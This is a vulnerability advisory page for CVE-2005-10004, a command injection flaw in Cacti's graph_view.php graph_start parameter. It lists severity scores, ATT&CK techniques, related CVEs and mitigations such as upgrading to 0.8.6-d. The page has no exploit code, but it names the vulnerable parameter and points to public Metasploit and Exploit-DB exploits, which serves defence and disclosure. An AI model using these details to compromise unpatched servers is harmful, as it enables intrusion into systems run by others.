Cyber Resilience

CVE-2005-10004

HighPublic PoCRCE

Published: 30 August 2025

Published
30 August 2025
Modified
26 December 2025
KEV Added
Patch
CVSS Score v4 8.7 CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.5798 98.2th percentile
Risk Priority 52 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2005-10004 is a high-severity OS Command Injection (CWE-78) vulnerability in Cacti Cacti. Its CVSS base score is 8.7 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 1.8% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

Cacti versions prior to 0.8.6-d are affected by a remote command execution vulnerability in the graph_view.php script, classified under CWE-78 (OS Command Injection). The issue stems from improper handling of the graph_start GET parameter during graph rendering, allowing injection of arbitrary shell commands. This flaw carries a CVSS v3.1 base score of 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), indicating high severity due to its potential for confidentially, integrity, and availability impacts.

An authenticated user with low privileges (PR:L) can exploit this vulnerability remotely over the network with low complexity and no user interaction required. Successful exploitation enables execution of arbitrary commands on the underlying operating system under the privileges of the web server process, potentially leading to full system compromise and integrity violations.

References point to mitigation through upgrading to Cacti version 0.8.6-d or later, as indicated by official download pages. Public exploits are available, including a Metasploit module for unix/webapp/cacti_graphimage_exec and entries on Exploit-DB (e.g., 16881 and 9911), confirming active exploitation vectors.

This vulnerability, despite its 2005-era origins, received a CVE assignment in 2025, highlighting ongoing risks in legacy Cacti deployments with documented real-world exploits.

EU & UK References

Vulnerability details

Cacti versions prior to 0.8.6-d contain a remote command execution vulnerability in the graph_view.php script. An authenticated user can inject arbitrary shell commands via the graph_start GET parameter, which is improperly handled during graph rendering. This flaw allows attackers to…

more

execute commands on the underlying operating system with the privileges of the web server process, potentially compromising system integrity.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.004 Unix Shell Execution
Adversaries may abuse Unix shell commands and scripts for execution.
Why these techniques?

Direct OS command injection (CWE-78) in a web app enables remote exploitation of a public-facing application (T1190) and Unix shell command execution (T1059.004).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2025-22604Same product: Cacti Cacti
CVE-2025-26520Same product: Cacti Cacti
CVE-2024-54146Same product: Cacti Cacti
CVE-2025-66399Same product: Cacti Cacti
CVE-2024-54145Same product: Cacti Cacti
CVE-2025-24367Same product: Cacti Cacti
CVE-2025-24368Same product: Cacti Cacti
CVE-2026-42454Shared CWE-78
CVE-2026-34796Shared CWE-78
CVE-2026-40111Shared CWE-78

Affected Assets

cacti
cacti
≤ 0.8.6d

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly mitigates the vulnerability by requiring timely remediation through patching or upgrading Cacti to version 0.8.6-d or later where the command injection flaw is fixed.

prevent

Prevents OS command injection by enforcing validation and sanitization of the graph_start GET parameter in the graph_view.php script before processing.

prevent

Limits damage from successful RCE exploitation by enforcing least privilege on the web server process executing the injected commands.

References